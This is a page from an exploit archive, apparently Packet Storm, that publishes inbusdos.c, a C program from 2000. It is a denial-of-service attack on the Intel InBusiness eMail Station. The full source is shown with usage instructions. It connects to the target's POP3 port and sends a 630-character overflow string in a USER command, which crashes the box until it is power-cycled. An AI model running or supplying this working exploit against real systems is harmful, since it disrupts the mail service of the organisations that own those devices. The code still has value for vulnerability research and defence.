what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

inbusdos.c

inbusdos.c
Posted Oct 27, 2000
Authored by Incubus | Site securax.org

Denial of Service attack against an Intel InBusiness eMail Station. Will send a 630 char buffer to the pop server as argument of a USER command. The little box needs to be "powered off" and -on again.

tags | exploit, denial of service
SHA-256 | 097d217d961c8d8bf396fe40cca2df3a255ed805abb39c1fe873baf76da9a46a

inbusdos.c

Change Mirror Download

/*
* intel InBusiness eMail Station DoS
*
* Errr... Denial Of Service against that little black intel box
* by incubus <incubus@securax.org>
*
* Respect: securax, hackschool, shelloracle, tessa, kim,
* glyc, splat, lamagra and steven.
*/

#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>

void usage(char *proggie){
fprintf (stderr, "Intel InBusiness eMail Station Denial of Service\n");
fprintf (stderr, "do %s mail.server.com\n", proggie);
fprintf (stderr, "mail.server.com must be an InBusiness eMail Station\n\n");
exit(-1);
}

int main(int argc, char **argv){
char buf[636];
int i, sock, result;
struct sockaddr_in name;
struct hostent *hostinfo;
if (argc < 2) usage(argv[0]);
fprintf (stdout, "Intel InBusiness eMail Station Denial of Service\n");
fprintf (stdout, "by incubus <incubus@securax.org>\n\n");
hostinfo=gethostbyname(argv[1]);
if (!hostinfo){ herror("Error"); exit(-1); }
name.sin_family=AF_INET; name.sin_port=htons(110);
name.sin_addr=*(struct in_addr *)hostinfo->h_addr;
sock=socket(AF_INET, SOCK_STREAM, 0);
result=connect(sock, (struct sockaddr *)&name, sizeof(struct sockaddr_in));
if (result != 0) { herror("Oops"); exit(-1); }
if (sock < 0){ herror("Oops"); exit(-1); }
strncpy(buf, "user ", 5);
for (i=0; i<630; i++) strncat(buf, "A", 1);
send(sock, buf, sizeof(buf), 0);
close(sock);
fprintf (stdout, "Denial of Service done\n\n");
close(sock);
}
Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    25 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    21 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    14 Files
  • 15
    Oct 15th
    49 Files
  • 16
    Oct 16th
    28 Files
  • 17
    Oct 17th
    23 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close